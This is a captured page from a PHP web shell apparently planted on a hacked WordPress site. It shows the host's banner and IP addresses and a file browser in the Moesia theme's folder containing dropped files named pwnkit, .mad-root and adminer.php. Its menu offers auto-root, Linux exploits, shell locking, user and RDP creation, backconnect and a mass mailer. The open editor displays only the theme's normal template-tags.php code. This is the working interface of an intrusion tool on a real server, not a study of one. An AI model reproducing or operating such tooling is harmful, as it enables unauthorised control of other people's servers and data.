Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
moesia /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
prettyphoto
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
custom-header.php
3.11
KB
-rw-r--r--
customizer.php
82.3
KB
-rw-r--r--
extras.php
2.3
KB
-rw-r--r--
jetpack.php
392
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rows.php
2.56
KB
-rw-r--r--
template-tags.php
4.24
KB
-rw-r--r--
tha-theme-hooks.php
4.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template-tags.php
<?php /** * Custom template tags for this theme. * * Eventually, some of the functionality here could be replaced by core features. * * @package Moesia */ if ( ! function_exists( 'moesia_paging_nav' ) ) : /** * Display navigation to next/previous set of posts when applicable. */ function moesia_paging_nav() { // Don't print empty markup if there's only one page. if ( $GLOBALS['wp_query']->max_num_pages < 2 ) { return; } ?> <nav class="navigation paging-navigation clearfix" role="navigation"> <h1 class="screen-reader-text"><?php _e( 'Posts navigation', 'moesia' ); ?></h1> <div class="nav-links"> <?php if ( get_next_posts_link() ) : ?> <div class="nav-previous"><?php next_posts_link( __( '<span class="meta-nav">←</span> Older posts', 'moesia' ) ); ?></div> <?php endif; ?> <?php if ( get_previous_posts_link() ) : ?> <div class="nav-next"><?php previous_posts_link( __( 'Newer posts <span class="meta-nav">→</span>', 'moesia' ) ); ?></div> <?php endif; ?> </div><!-- .nav-links --> </nav><!-- .navigation --> <?php } endif; if ( ! function_exists( 'moesia_post_nav' ) ) : /** * Display navigation to next/previous post when applicable. */ function moesia_post_nav() { // Don't print empty markup if there's nowhere to navigate. $previous = ( is_attachment() ) ? get_post( get_post()->post_parent ) : get_adjacent_post( false, '', true ); $next = get_adjacent_post( false, '', false ); if ( ! $next && ! $previous ) { return; } ?> <nav class="navigation post-navigation clearfix" role="navigation"> <h1 class="screen-reader-text"><?php _e( 'Post navigation', 'moesia' ); ?></h1> <div class="nav-links"> <?php previous_post_link( '<div class="nav-previous">%link</div>', _x( '<span class="meta-nav">←</span> %title', 'Previous post link', 'moesia' ) ); next_post_link( '<div class="nav-next">%link</div>', _x( '%title <span class="meta-nav">→</span>', 'Next post link', 'moesia' ) ); ?> </div><!-- .nav-links --> </nav><!-- .navigation --> <?php } endif; if ( ! function_exists( 'moesia_posted_on' ) ) : /** * Prints HTML with meta information for the current post-date/time and author. */ function moesia_posted_on() { $time_string = '<time class="entry-date published" datetime="%1$s">%2$s</time>'; if ( get_the_time( 'U' ) !== get_the_modified_time( 'U' ) ) { $time_string .= '<time class="updated" datetime="%3$s">%4$s</time>'; } $time_string = sprintf( $time_string, esc_attr( get_the_date( 'c' ) ), esc_html( get_the_date() ), esc_attr( get_the_modified_date( 'c' ) ), esc_html( get_the_modified_date() ) ); printf( __( '<span class="posted-on"><i class="fa fa-calendar"></i> %1$s</span><span class="byline"><i class="fa fa-user"></i> %2$s</span>', 'moesia' ), sprintf( '<a href="%1$s" rel="bookmark">%2$s</a>', esc_url( get_permalink() ), $time_string ), sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s">%2$s</a></span>', esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ), esc_html( get_the_author() ) ) ); } endif; /** * Returns true if a blog has more than 1 category. * * @return bool */ function moesia_categorized_blog() { if ( false === ( $all_the_cool_cats = get_transient( 'moesia_categories' ) ) ) { // Create an array of all the categories that are attached to posts. $all_the_cool_cats = get_categories( array( 'fields' => 'ids', 'hide_empty' => 1, // We only need to know if there is more than one category. 'number' => 2, ) ); // Count the number of categories that are attached to the posts. $all_the_cool_cats = count( $all_the_cool_cats ); set_transient( 'moesia_categories', $all_the_cool_cats ); } if ( $all_the_cool_cats > 1 ) { // This blog has more than 1 category so moesia_categorized_blog should return true. return true; } else { // This blog has only 1 category so moesia_categorized_blog should return false. return false; } } /** * Flush out the transients used in moesia_categorized_blog. */ function moesia_category_transient_flusher() { // Like, beat it. Dig? delete_transient( 'moesia_categories' ); } add_action( 'edit_category', 'moesia_category_transient_flusher' ); add_action( 'save_post', 'moesia_category_transient_flusher' );
Close